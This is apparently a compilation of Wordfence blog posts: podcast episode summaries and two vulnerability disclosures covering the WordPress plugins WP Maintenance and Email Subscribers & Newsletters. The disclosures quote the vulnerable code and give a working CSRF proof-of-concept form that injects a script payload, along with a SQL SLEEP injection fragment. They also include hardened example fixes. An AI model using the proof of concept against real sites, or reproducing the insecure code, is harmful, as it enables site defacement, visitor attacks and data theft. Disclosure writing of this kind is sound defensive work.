Podcast Episode 60: Top WordPress Influencer Lists & Chrome Password Security Improvements

A small furor erupted over a top influencers in WordPress list that neglected to show the diverse nature of the WordPress community. We talk about the impossibility of making an accurate list that reflects the true nature of WordPress influence or contribution, and the diversity we saw during our work on Open, our film project about the WordPress community. We also talk about Google’s plans to give slow websites a new badge of shame in Chrome, password security updates in Chrome 79, and DHS reconsidering a plan to use facial-recognition technology on all U.S. citizens traveling internationally.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

  • A WordPress top influencer list misses out on the diversity and depth of WordPress influence and contribution.
  • Google Chrome plans to warn site visitors of speed and performance problems with websites.
  • Chrome 79 launches with password protection and dozens of security fixes.
  • DHS reconsiders facial recognition technology on US travelers. The US lags behind China in number of surveillance cameras.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Please feel free to post your feedback in the comments below.

The post Podcast Episode 60: Top WordPress Influencer Lists & Chrome Password Security Improvements appeared first on Wordfence.


Podcast Episode 59: Mailpoet’s Kim Gjerstad on Beating Spammers and Improving Net Promoter Scores

Kim Gjerstad, one of the founders of Mailpoet, visited with Mark at the Wordfence booth at WordCamp US. Kim and Mark talked about the origins of Mailpoet, the plugin that gives users a full email management system within the WordPress administrative dashboard. They talk about email deliverability as well as the challenges of fighting email abuse, a constant battle that Mailpoet is winning.

They also talk about net promoter scores and what it means for the success of a SaaS business.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Kim Gjerstad on Twitter as @kgjerstad. You can learn more about Mailpoet at mailpoet.com.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Please feel free to post your feedback in the comments below.

The post Podcast Episode 59: Mailpoet’s Kim Gjerstad on Beating Spammers and Improving Net Promoter Scores appeared first on Wordfence.


Episode 58: Leadership and the Business of WordPress Plugins: Lessons from the Yoast Black Friday Ad

Yoast, the SEO plugin installed on 9 million WordPress sites, ran a Black Friday sale, experimenting with an ad in the WordPress admin dashboard. The internet furor was dramatic, and Yoast’s CEO Marieke van de Rakt took ownership, showing exceptional leadership. We discuss the ad and the response from both users and competitors and the challenges of running a plugin business under a freemium model. We also cover stories about AVG and Avast browser extensions, the Magento Marketplace hack, the private equity purchase of .org and a data leak affecting 1.2 billion people.

Here are approximate timestamps if you’d like to jump around:
1:10 The Yoast Black Friday Ad Controversy
9:15 Yoast’s leadership in the midst of attacks
15:00 The freemium plugin model, advertising in WordPress admin
25:17 Mozilla Removes Avast and AVG extensions
29:45 Magento Marketplace Hack
32:00 Lessons for WordPress
34:00 Private Equity purchase of .org
43:00 Leak affecting 1.2 billion people

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

  • WP Tavern’s coverage of the Yoast Black Friday ad, and discussion on Hacker News.
  • Mozilla removes Avast/AVG browser extensions.
  • Adobe admits breach of Magento Marketplace portal. Matt Barry’s research into similar risks with the WordPress.org systems.
  • Ethos Capital is taking over .org early next year, and some are calling it the great .org heist, saying that .org was sold for half its valuation.
  • Personal And Social Information Of 1.2 Billion People Discovered In Massive Data Leak.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Please feel free to post your feedback in the comments below.

The post Episode 58: Leadership and the Business of WordPress Plugins: Lessons from the Yoast Black Friday Ad appeared first on Wordfence.


Podcast Episode 57: SEO Content Strategy and Lock Picking with Maddy Osman at WordCamp US

Maddy Osman is an SEO content strategist who has worked with a number of familiar brands in both the WordPress and SaaS spaces. She spoke at WordCamp US and took some time to chat with us at the Wordfence sponsor booth. Maddy talks about how she got started in SEO content strategy after doing web design and development, and also what the entrepreneurial journey has been like for her.

Maddy also shows off some of her lock picking skills she picked up while hanging out at the Wordfence booth.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Maddy on Twitter as @MaddyOsman. You can learn more about Maddy’s work at The-Blogsmith.com.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Please feel free to post your feedback in the comments below.

The post Podcast Episode 57: SEO Content Strategy and Lock Picking with Maddy Osman at WordCamp US appeared first on Wordfence.


Episode 56: WordCamp US, WordPress 5.3 and Chrome Blocking Mixed Content

In Episode 56, we review the premiere of Open, The Community Code, a film about the WordPress community that world premiered at Matt Mullenweg’s State of the Word Keynote at WordCamp US. Mark and Kathy talk about what it was like watching friends in the community see the film for the first time.

We also discuss recent updates to WordPress in version 5.3, especially some of the improvements to the new Gutenberg editor, accessibility, and site health. We also review Google Chrome’s plans to warn and block mixed content and how site owners can prepare now for these upcoming changes.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

  • Watch Open | The Community Code at open.film.
  • WordPress version 5.3 was launched on November 12 with a number of improvements to the block editor, accessibility and site health.
  • Google will warn site visitors about mixed content in December and start blocking mixed content in January.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Please feel free to post your feedback in the comments below.

The post Episode 56: WordCamp US, WordPress 5.3 and Chrome Blocking Mixed Content appeared first on Wordfence.


High Severity Vulnerability Patched in WP Maintenance Plugin

Description: Cross-Site Request Forgery to Stored Cross-Site Scripting
CVSS v3.0 Score: 8.8 (High)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:H
Affected Plugin: WP Maintenance
Plugin Slug: wp-maintenance
Affected Versions: <= 5.0.5
Patched Version: 5.0.6

On November 15th, 2019, our Threat Intelligence team identified a vulnerability present in WP Maintenance, a WordPress plugin with approximately 30,000+ active installs. This flaw allowed attackers to enable a vulnerable site’s maintenance mode and inject malicious code affecting site visitors. We disclosed this issue privately to the plugin’s developer who released a patch the next day.

Plugin versions of WP Maintenance up to 5.0.5 are vulnerable to attacks against this flaw. All WP Maintenance users should update to version 5.0.6 immediately.

Limited Nonce Protection and Input/Output Sanitization

WP Maintenance provides a maintenance mode to site owners wishing to take their site offline during a maintenance period, with useful features for enabling and customizing a maintenance page. These features include a customizable title, customizable text, a custom maintenance page image, custom CSS styles, a countdown, font and color choices, etc.

With extensive customizability comes a greater responsibility for security. Unfortunately, with no nonce protection and scarce input/output sanitization of values, Cross-Site Request Forgery (CSRF) leading to Cross-Site Scripting (XSS) vulnerabilities were possible in WP Maintenance.

Settings could be edited across 6 tabs: General, Colors & Fonts, Pictures, CountDown, CSS Style, and Settings, all of which were susceptible to a CSRF attack. Additionally, several settings could be injected with malicious code, allowing XSS attacks. Settings could also be manipulated to an attacker’s benefit. For instance, an attacker could enable maintenance mode on a site, causing a loss of availability.

The following code illustrates the lack of nonce verification on setting updates:

/* Update the settings */
if( isset($_POST['action']) && $_POST['action'] == 'update_general' ) {

    if( isset($_POST["wp_maintenance_social_options"]['reset']) && $_POST["wp_maintenance_social_options"]['reset'] ==1 ) {
        unset($_POST["wp_maintenance_social"]);
        $_POST["wp_maintenance_social"] = '';
    }
    // No nonce or capability check precedes these update_option() calls:
    // any POST carrying action=update_general is accepted as-is.
    update_option('wp_maintenance_social', $_POST["wp_maintenance_social"]);
    update_option('wp_maintenance_social_options', $_POST["wp_maintenance_social_options"]);
    update_option('wp_maintenance_active', $_POST["wp_maintenance_active"]);

    $options_saved = wpm_update_settings($_POST["wp_maintenance_settings"]);

    $messageUpdate = 1;
}

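For contrast, here is how the same settings update looks when it is protected. This is an added example written for this post, not code from the WP Maintenance plugin or its patch; the function names prefixed wpm_example_ are invented, the handler is hooked on admin-post.php rather than the plugin’s own settings page, and only a handful of the plugin’s settings keys are shown. It covers the three things the vulnerable handler above lacks: a capability check, a nonce check, and sanitization of each value on the way in, plus escaping of the newsletter title on the way out so that a previously stored value cannot run as script.

```php
<?php
// Added example (not the plugin's code): a hardened settings update handler.
// Hook and function names below are illustrative.

// Render the form: the nonce field binds this form to a specific action name.
function wpm_example_render_general_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <?php wp_nonce_field( 'wpm_update_general', 'wpm_nonce' ); ?>
        <input type="hidden" name="action" value="update_general" />
        <label>Newsletter title
            <input type="text" name="wp_maintenance_settings[title_newletter]"
                   value="<?php echo esc_attr( wpm_example_setting( 'title_newletter' ) ); ?>" />
        </label>
        <?php submit_button(); ?>
    </form>
    <?php
}

// Read one stored setting, defaulting to an empty string.
function wpm_example_setting( $key ) {
    $settings = get_option( 'wp_maintenance_settings', array() );
    return isset( $settings[ $key ] ) ? (string) $settings[ $key ] : '';
}

// admin_post_{action} fires for any logged-in user, so the handler itself
// must decide who may change settings and whether the request is genuine.
function wpm_example_handle_general_update() {
    // 1. Only users allowed to manage options may change plugin settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to change these settings.', 'wp-maintenance' ), 403 );
    }
    // 2. The nonce ties the request to a form this user loaded; a cross-site
    //    POST forged by another page cannot know it, so the request dies here.
    check_admin_referer( 'wpm_update_general', 'wpm_nonce' );

    // 3. Whitelist and sanitize each incoming setting before storing it.
    $raw = ( isset( $_POST['wp_maintenance_settings'] ) && is_array( $_POST['wp_maintenance_settings'] ) )
        ? wp_unslash( $_POST['wp_maintenance_settings'] )
        : array();
    $clean = array(
        'titre_maintenance' => sanitize_text_field( $raw['titre_maintenance'] ?? '' ),
        'text_maintenance'  => wp_kses_post( $raw['text_maintenance'] ?? '' ),
        'newletter'         => ( isset( $raw['newletter'] ) && '1' === $raw['newletter'] ) ? 1 : 0,
        'title_newletter'   => sanitize_text_field( $raw['title_newletter'] ?? '' ),
    );
    update_option( 'wp_maintenance_settings', $clean );

    $active = ( isset( $_POST['wp_maintenance_active'] ) && '1' === $_POST['wp_maintenance_active'] ) ? 1 : 0;
    update_option( 'wp_maintenance_active', $active );

    wp_safe_redirect( add_query_arg( 'updated', '1', admin_url( 'admin.php?page=wp-maintenance' ) ) );
    exit;
}
add_action( 'admin_post_update_general', 'wpm_example_handle_general_update' );

// 4. Escape at render time as well: even a title stored before the fix
//    is shown as text on the maintenance page, never executed.
function wpm_example_render_newsletter_title() {
    echo '<h2>' . esc_html( wpm_example_setting( 'title_newletter' ) ) . '</h2>';
}
```

The order of the checks matters less than their presence: check_admin_referer() dies on a missing or stale nonce, so a forged request never reaches update_option(), and the capability check means that even a valid nonce belonging to a low-privilege user does not help. Only the wp_ajax-style logged-in hook is registered (admin_post_update_general, not admin_post_nopriv_update_general), so logged-out requests are not dispatched to the handler at all.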

A Closer Look at the Exploit

Although all of the settings in this plugin could be changed as a result of this CSRF vulnerability, the “General” settings tab had the most potential impact. This tab is where maintenance mode could be enabled and custom text and title options could be configured.

General settings tab for WP Maintenance.

With no input sanitization, the “Enable Newsletter” feature allowed an attacker to inject malicious code, creating a stored XSS vulnerability that could be exploited by taking advantage of the CSRF vulnerability.

The newsletter title is displayed on the maintenance page without output sanitization, meaning any malicious code set in the newsletter block by an attacker would be executed by a visitor’s browser while the site is in maintenance mode.

Enable newsletter setting from dashboard.

Because an attacker could also enable maintenance mode on a single setting update, these vulnerabilities combined could lead to a site being taken offline and, for example, used to redirect visitors to a malicious site.

Example of what a site would look like if exploited by this vulnerability.

Proof of Concept

<html>
  <body>
   <form action="http://URL/wp-admin/admin.php?page=wp-maintenance" method="POST">
      <input type="hidden" name="action" value="update_general" />
      <input type="hidden" name="wp_maintenance_active" value="1" />
      <input type="hidden" name="wp_maintenance_settings[titre_maintenance]" value="EVIL ATTACKER!" />
      <input type="hidden" name="wp_maintenance_settings[text_maintenance]" value="Come back quickly!" />
      <input type="hidden" name="wp_maintenance_settings[text_bt_maintenance]" value="" />
      <input type="hidden" name="wp_maintenance_settings[add_wplogin]" value="0" />
      <input type="hidden" name="wp_maintenance_settings[add_wplogin_title]" value="" />
      <input type="hidden" name="wp_maintenance_settings[enable_seo]" value="0" />
      <input type="hidden" name="wp_maintenance_settings[seo_title]" value="" />
      <input type="hidden" name="wp_maintenance_settings[seo_description]" value="" />
      <input type="hidden" name="wp_maintenance_settings[favicon]" value="" />
      <input type="hidden" name="wp_maintenance_settings[code_analytics]" value="" />
      <input type="hidden" name="wp_maintenance_settings[domain_analytics]" value="URL" />
      <input type="hidden" name="wp_maintenance_social_options[enable]" value="0" />
      <input type="hidden" name="wp_maintenance_social_options[texte]" value="" />
      <input type="hidden" name="wp_maintenance_social[facebook]" value="" />
      <input type="hidden" name="wp_maintenance_social[twitter]" value="" />
      <input type="hidden" name="wp_maintenance_social[linkedin]" value="" />
      <input type="hidden" name="wp_maintenance_social[flickr]" value="" />
      <input type="hidden" name="wp_maintenance_social[youtube]" value="" />
      <input type="hidden" name="wp_maintenance_social[pinterest]" value="" />
      <input type="hidden" name="wp_maintenance_social[vimeo]" value="" />
      <input type="hidden" name="wp_maintenance_social[instagram]" value="" />
      <input type="hidden" name="wp_maintenance_social[google_plus]" value="" />
      <input type="hidden" name="wp_maintenance_social[about_me]" value="" />
      <input type="hidden" name="wp_maintenance_social[soundcloud]" value="" />
      <input type="hidden" name="wp_maintenance_social[skype]" value="" />
      <input type="hidden" name="wp_maintenance_social[tumblr]" value="" />
      <input type="hidden" name="wp_maintenance_social[blogger]" value="" />
      <input type="hidden" name="wp_maintenance_social[paypal]" value="" />
      <input type="hidden" name="wp_maintenance_social_options[size]" value="32" />
      <input type="hidden" name="wp_maintenance_social_options[style]" value="style1" />
      <input type="hidden" name="wp_maintenance_social_options[position]" value="bottom" />
      <input type="hidden" name="wp_maintenance_social_options[align]" value="center" />
      <input type="hidden" name="wp_maintenance_social_options[theme]" value="" />
      <input type="hidden" name="wp_maintenance_social_options[reset]" value="0" />
      <input type="hidden" name="wp_maintenance_settings[newletter]" value="1" />
      <input type="hidden" name="wp_maintenance_settings[title_newletter]" value="<script>alert("YOU'VE BEEN HACKED!")</script>" />
      <input type="hidden" name="wp_maintenance_settings[type_newletter]" value="shortcode" />
      <input type="hidden" name="wp_maintenance_settings[code_newletter]" value="" />
      <input type="hidden" name="wp_maintenance_settings[iframe_newletter]" value="" />
      <input type="hidden" name="submit" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

CSRF & Security Awareness

This vulnerability is a good reminder of the importance of staying vigilant about all input from users on our sites, as CSRF exploits are difficult to protect against. A CSRF, or Cross-Site Request Forgery, vulnerability “is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated.” This means that CSRF vulnerabilities can only be exploited when someone with administrative capability performs an action set up by an attacker, for example clicking on a link while currently authenticated to a web application like WordPress.

A common example to consider is receiving a comment on your WordPress blog containing a link. Clicking the link in the comment to see what the commenter is referring to could lead to exploitation of a vulnerability. Instead of that link taking you to the site you think you may be visiting, it could send a request to update your WordPress website plugin settings on your behalf.

Stay vigilant when clicking links or attachments in comments or even in emails, because it is possible that someone is trying to exploit the human weakness on your site: you. We recommend not visiting any links from an untrusted source, because malicious content could be on the other side of that link, even on the other end of a shortened URL.

If you absolutely must visit and don’t have a virtual machine to protect you from infection, ensure you have antivirus on your machine, then copy the link, make sure you are logged out of all sites, open an incognito window, paste the link in the incognito browser, then visit the site. This can help protect against CSRF vulnerabilities.

As shown in this post, a CSRF has the potential to severely affect your site, its availability and your users, and this vulnerability can be easily avoided through security awareness.

Wordfence Protection

Wordfence’s generic XSS firewall rules protect against the stored XSS in vulnerable versions of WP Maintenance. To exploit this XSS vulnerability the CSRF vulnerability must be exploited. As CSRF vulnerabilities cannot be protected against via firewall, we recommend updating to the latest version of WP Maintenance and following our CSRF recommendations to keep your sites safe.

Disclosure Timeline

November 15th, 2019 – Initial private contact with developer and notification of security issue.
November 15th, 2019 – Developer responds.
November 16th, 2019 – Developers acknowledged issue and released patch.

Conclusion

In today’s post, we detailed a CSRF to Stored XSS flaw present in the WP Maintenance plugin. This flaw has been patched in version 5.0.6 and we recommend users update to the latest version available. Sites running Wordfence are protected against XSS exposure by our firewall’s generic rules; however, our firewall rules cannot protect against this CSRF vulnerability, so it is important to take precautionary measures when clicking links in comments or sent to you via email so you are not exploited by this vulnerability.

The post High Severity Vulnerability Patched in WP Maintenance Plugin appeared first on Wordfence.


Podcast Episode 55: Yoast’s Marieke van de Rakt & Michiel Heijmans at WordCamp US

At WordCamp US in Saint Louis, Mark sat down with Yoast CEO Marieke van de Rakt and COO Michiel Heijmans in the Wordfence booth to talk about not only how Yoast began, but also how they’ve grown to over 9 million active installations and the challenges of managing such a large user base. Marieke and Michiel also talk about the big changes coming in 2020 for the Yoast plugin as well as training and educational efforts via Yoast Academy.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Marieke on Twitter as @MariekeRakt and Michiel as @Michielheijmans. You can learn more about Yoast and Yoast Academy at Yoast.com.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Please feel free to post your feedback in the comments below.

The post Podcast Episode 55: Yoast’s Marieke van de Rakt & Michiel Heijmans at WordCamp US appeared first on Wordfence.


Multiple Vulnerabilities Patched in Email Subscribers & Newsletters Plugin

A few weeks ago, our Threat Intelligence team identified several vulnerabilities present in Email Subscribers & Newsletters, a WordPress plugin with approximately 100,000+ active installs. We disclosed this issue privately to the plugin’s development team who responded quickly, releasing interim patches just a few days after our initial disclosure. The plugin team also worked with us to implement additional security measures.

Plugin versions of Email Subscribers & Newsletters up to 4.2.3 are vulnerable to attacks against all of the vulnerabilities described below, and versions up to 4.3.0 are vulnerable to the SQL injection vulnerability. All Email Subscribers & Newsletters users should update to version 4.3.1 immediately. Wordfence Premium customers received new firewall rules on October 14th to protect against exploits targeting these vulnerabilities. Free Wordfence users receive these rules on November 14th.


Unauthenticated File Download w/ Information Disclosure

Description: Unauthenticated File Download w/ Information Disclosure
CVSS v3.0 Score: 5.8 (Medium)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Affected Plugin: Email Subscribers & Newsletters
Plugin Slug: email-subscribers
Affected Versions: <= 4.2.2
Patched Version: 4.2.3

Email Subscribers & Newsletter provides site owners with the ability to create newsletter campaigns that site users can subscribe to. One feature of this plugin is the ability to export all of the site’s subscribers into a single CSV file containing first names, last names, email addresses, mailing lists the subscriber is on, and more. Unfortunately, there was a flaw in this plugin that allowed unauthenticated users to export subscriber lists and gain all of the information provided by subscribers.

Vulnerability in Detail

In order to provide this functionality, the plugin registered the query variables status and report which were used to signal the export of the subscribers list. In vulnerable versions of this plugin, there was no access control in place to verify that the user exporting the subscriber list had the proper authorization to do so. Therefore, this flaw allowed any unauthenticated user the ability to export the list of subscribers and obtain sensitive information such as user emails by sending the correct query variables and corresponding parameters.

	public function __construct() {

		$report = ig_es_get_request_data( 'report' );
		$status = ig_es_get_request_data( 'status' );

		// No capability or nonce check here: any request carrying both
		// query variables reaches the export below.
		if ( $report && $status ) {

			$status = trim( $status );

			$selected_list_id = 0;

			if ( 'select_list' === $status ) {
				$selected_list_id = ig_es_get_request_data( 'list_id', 0 );

				if ( 0 === $selected_list_id ) {
					$message = __( "Please Select List", "email-subscribers" );
					ES_Common::show_message( $message, 'error' );
					exit();
				}
			}

			$csv = $this->generate_csv( $status, $selected_list_id );
			// Remainder of the constructor (sending the CSV) not shown.
		}
	}
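The following is an added example of what an export endpoint looks like with access control in front of it. It is not code from the Email Subscribers & Newsletters plugin or its patch; the es_example_ function names, the admin-post.php action name and the status values are invented, and the subscriber rows are constructed inline where a real handler would query the subscribers table.

```php
<?php
// Added example (not the plugin's code): a CSV export that requires a
// capability and a nonce before any subscriber data is streamed.

// Build the export link shown to administrators; the nonce is bound to
// the export action so the link cannot be reused from another context.
function es_example_export_url( $status = 'all' ) {
    $url = add_query_arg(
        array( 'action' => 'es_example_export', 'status' => $status ),
        admin_url( 'admin-post.php' )
    );
    return wp_nonce_url( $url, 'es_example_export', 'es_nonce' );
}

// Turn rows into CSV text; fputcsv() handles quoting of commas and quotes.
function es_example_csv( array $rows ) {
    $out = fopen( 'php://temp', 'r+' );
    fputcsv( $out, array( 'first_name', 'last_name', 'email' ) );
    foreach ( $rows as $row ) {
        fputcsv( $out, array( $row['first_name'], $row['last_name'], $row['email'] ) );
    }
    rewind( $out );
    $csv = stream_get_contents( $out );
    fclose( $out );
    return $csv;
}

// admin_post_* fires only for logged-in users, but for *any* logged-in user:
// the capability check is what stops a subscriber-level account from exporting.
function es_example_handle_export() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Not allowed.', 'email-subscribers' ), 403 );
    }
    check_admin_referer( 'es_example_export', 'es_nonce' );

    // Whitelist the status value instead of trusting the query variable.
    $status = isset( $_GET['status'] ) ? sanitize_key( wp_unslash( $_GET['status'] ) ) : 'all';
    if ( ! in_array( $status, array( 'all', 'subscribed', 'unsubscribed' ), true ) ) {
        wp_die( esc_html__( 'Unknown status.', 'email-subscribers' ), 400 );
    }

    // Constructed sample rows; a real handler queries the subscribers table here.
    $rows = array(
        array( 'first_name' => 'Ada', 'last_name' => 'Example', 'email' => 'ada@example.com' ),
        array( 'first_name' => 'Bob', 'last_name' => 'Sample',  'email' => 'bob@example.com' ),
    );

    nocache_headers();
    header( 'Content-Type: text/csv; charset=utf-8' );
    header( 'Content-Disposition: attachment; filename="subscribers-' . $status . '.csv"' );
    echo es_example_csv( $rows );
    exit;
}
add_action( 'admin_post_es_example_export', 'es_example_handle_export' );
```

Because only admin_post_es_example_export is registered (and not the admin_post_nopriv_ variant), an unauthenticated request to admin-post.php is never routed to the handler, which is the property the vulnerable constructor above lacked.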

Blind SQL Injection in INSERT statement

Description: Blind SQL Injection in INSERT statement
CVSS v3.0 Score: 8.3 (High)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
Affected Plugin: Email Subscribers & Newsletters
Plugin Slug: email-subscribers
Affected Versions: <= 4.3.0
Patched Version: 4.3.1

Another feature of Email Subscribers & Newsletters was a functionality that tracked ‘open’ actions, amongst a few others, for emails that were sent via configured campaigns. Unfortunately, there was a flaw in this plugin that allowed SQL statements to be passed to the database in the hash parameter creating a blind SQL injection vulnerability. These actions were unauthenticated by default, meaning any user could send these requests, even if no campaigns existed, increasing the significance of this vulnerability.

Vulnerability in Detail

The vulnerable code was present within the \ES_Actions::add function. Rather than using a wpdb::prepare statement, the plugin concatenated the values of the $args parameter into the SQL query and did not escape any additional SQL characters or input. This allowed an attacker to blindly inject SQL statements, such as '+SLEEP+', and observe the response from the database, providing useful information to an attacker.

 private function add( $args, $explicit = true ) {

	global $wpdb;

	$args = wp_parse_args( $args, array(
		'created_at' => ig_es_get_current_gmt_timestamp(),
		'updated_at' => ig_es_get_current_gmt_timestamp(),
		'count'      => 1,
	) );

	$sql = "INSERT INTO {$wpdb->prefix}ig_actions (" . implode( ', ', array_keys( $args ) ) . ')';
	$sql .= " VALUES ('" . implode( "','", array_values( $args ) ) . "') ON DUPLICATE KEY UPDATE";

	$sql .= ( $explicit ) ? " created_at = created_at, count = count+1, updated_at = '" . ig_es_get_current_gmt_timestamp() . "'" : ' count = values(count)';

	$result = $wpdb->query( $sql );

	if ( false !== $result ) {
		return true;
	}

	return false;
}
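The following is an added example showing the same INSERT … ON DUPLICATE KEY UPDATE built with $wpdb->prepare(). It is not the plugin’s code or its patch; the es_example_ function names and the list of columns in ig_actions are assumptions, and the timestamps are plain integers from time() rather than the plugin’s ig_es_get_current_gmt_timestamp(). The key point it demonstrates is that column names cannot be bound as values, so they are whitelisted, while every value goes through a placeholder.

```php
<?php
// Added example (not the plugin's code): a parameterized version of the
// tracking-action insert. Column list and function names are illustrative.

// Columns that may appear in a row, with the prepare() placeholder for each.
// Identifiers cannot be bound like values, so this whitelist is what keeps
// attacker-controlled keys out of the SQL text.
function es_example_action_columns() {
    return array(
        'contact_id'  => '%d',
        'campaign_id' => '%d',
        'type'        => '%d',
        'created_at'  => '%d',
        'updated_at'  => '%d',
        'count'       => '%d',
    );
}

function es_example_add_action( array $args, $explicit = true ) {
    global $wpdb;
    $columns = es_example_action_columns();
    $now     = time();

    $args = wp_parse_args( $args, array(
        'created_at' => $now,
        'updated_at' => $now,
        'count'      => 1,
    ) );

    // Drop anything that is not a known column.
    $args = array_intersect_key( $args, $columns );
    if ( empty( $args ) ) {
        return false;
    }

    $names        = array_keys( $args );
    $placeholders = array();
    foreach ( $names as $name ) {
        $placeholders[] = $columns[ $name ];
    }

    $sql = "INSERT INTO {$wpdb->prefix}ig_actions (" . implode( ', ', $names ) . ')'
         . ' VALUES (' . implode( ', ', $placeholders ) . ') ON DUPLICATE KEY UPDATE ';
    $values = array_values( $args );

    if ( $explicit ) {
        $sql     .= 'created_at = created_at, count = count + 1, updated_at = %d';
        $values[] = $now;
    } else {
        $sql .= 'count = VALUES(count)';
    }

    // prepare() escapes and quotes every bound value; the query string itself
    // now contains only whitelisted identifiers and placeholders.
    $prepared = $wpdb->prepare( $sql, $values );
    if ( false === $prepared ) {
        return false;
    }
    return false !== $wpdb->query( $prepared );
}
```

With this shape, a value such as the '+SLEEP+' fragment mentioned above is stored as a literal (or rejected by the %d placeholder, which casts to an integer) instead of becoming part of the statement, so the blind timing channel disappears.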

Special thanks to our lead developer, Matt Barry, for discovering this vulnerability. 


Insecure Permissions on Dashboard and Settings

Description: Insecure Permissions on Dashboard and Settings
CVSS v3.0 Score: 6.3 (Medium)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Affected Plugin: Email Subscribers & Newsletters
Plugin Slug: email-subscribers
Affected Versions: <= 4.2.2
Patched Version: 4.2.3

Email Subscribers & Newsletter registers a menu full of settings, audience information, campaign information, forms, and more. This provides administrators with a central area to manage all of this plugin’s features. Unfortunately, there was a flaw in this plugin that allowed any user with the edit_post capability to view and modify settings, along with editing email campaigns and subscriber lists. Typically, only Contributor roles and above have the edit_post capability. However, a number of plugins and themes create custom roles that could allow base level users with the correct permissions to view and edit the settings and features of this plugin, introducing a security risk.

Vulnerability in Detail

This vulnerability was trivial to exploit for any attacker able to log in as a user with the edit_post capability. Once the attacker was logged in as a user with the correct capability, the menu options were displayed in the toolbar and the attacker could navigate to the settings and campaigns and make any changes they wanted to. This included sending new campaigns, viewing subscriber information, adding new users, changing settings, and more.

Example of what a user with the edit_post capability can see and modify.
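As an added illustration of the fix for this class of issue (not the plugin’s own code; the es_example_ names, menu slugs and filter name are invented), the menu below is registered with manage_options as the required capability, and each page callback re-checks that capability. A filter lets site owners with the custom roles mentioned above grant access deliberately, rather than the plugin defaulting to a broad capability such as edit_post.

```php
<?php
// Added example (not the plugin's code): registering an admin menu so that
// only users who may manage options can see and open it.

// The capability that gates every screen of this plugin. Sites with custom
// roles can change it through the filter instead of the plugin loosening it.
function es_example_menu_capability() {
    return apply_filters( 'es_example_menu_capability', 'manage_options' );
}

function es_example_register_menu() {
    $cap = es_example_menu_capability();

    // The capability argument controls both whether the menu is shown and
    // whether a direct request to the page slug is allowed.
    add_menu_page(
        __( 'Email Subscribers', 'email-subscribers' ),
        __( 'Email Subscribers', 'email-subscribers' ),
        $cap,
        'es-example-dashboard',
        'es_example_render_dashboard'
    );
    add_submenu_page(
        'es-example-dashboard',
        __( 'Settings', 'email-subscribers' ),
        __( 'Settings', 'email-subscribers' ),
        $cap,
        'es-example-settings',
        'es_example_render_settings'
    );
}
add_action( 'admin_menu', 'es_example_register_menu' );

// Re-check inside the callbacks so they stay safe if they are ever reused
// from another hook (an AJAX handler, for instance) that bypasses the menu.
function es_example_guard_page() {
    if ( ! current_user_can( es_example_menu_capability() ) ) {
        wp_die( esc_html__( 'You do not have permission to view this page.', 'email-subscribers' ), 403 );
    }
}

function es_example_render_dashboard() {
    es_example_guard_page();
    echo '<div class="wrap"><h1>' . esc_html__( 'Email Subscribers', 'email-subscribers' ) . '</h1></div>';
}

function es_example_render_settings() {
    es_example_guard_page();
    echo '<div class="wrap"><h1>' . esc_html__( 'Settings', 'email-subscribers' ) . '</h1></div>';
}
```

A site that needs a marketing role to manage campaigns would add the capability to that role and return it from the es_example_menu_capability filter; the plugin itself never has to widen the default.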


Cross-Site Request Forgery on Settings

Description: Cross-Site Request Forgery on Settings
CVSS v3.0 Score: 5.4 (Medium)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L
Affected Plugin: Email Subscribers & Newsletters
Plugin Slug: email-subscribers
Affected Versions: <= 4.2.2
Patched Version: 4.2.3

Email Subscribers & Newsletter provides site owners the ability to change and alter settings just like any other plugin. Unfortunately, there were no nonce checks on settings updates that verified if the request came directly from an already existing session with an authenticated administrative user, creating a CSRF vulnerability. This vulnerability allowed attackers to modify settings via CSRF. Some of the settings impacted included: messages to display after subscription, the email “from” address, what mailer to use, standard emails to send after certain actions, and more.

Vulnerability in Detail

The settings form for this plugin generated a nonce with the name es-update-settings and submitted this nonce with the settings. The issue in this case arose because the code did not perform any verification to check whether the nonce submitted was valid or not. With this vulnerability, a settings update could have been submitted with a blank or invalid nonce, as it did not verify that the nonce submitted came from a valid session. Because this plugin also lacked secure permissions, this vulnerability had a much larger target surface: any user with edit_post capabilities could be targeted, whereas typically only administrative level users have the ability to modify plugin settings.

	public function es_settings_callback() {

		$submitted     = ig_es_get_request_data( 'submitted' );
		$submit_action = ig_es_get_request_data( 'submit_action' );

		$nonce = ig_es_get_request_data( '_wpnonce' );

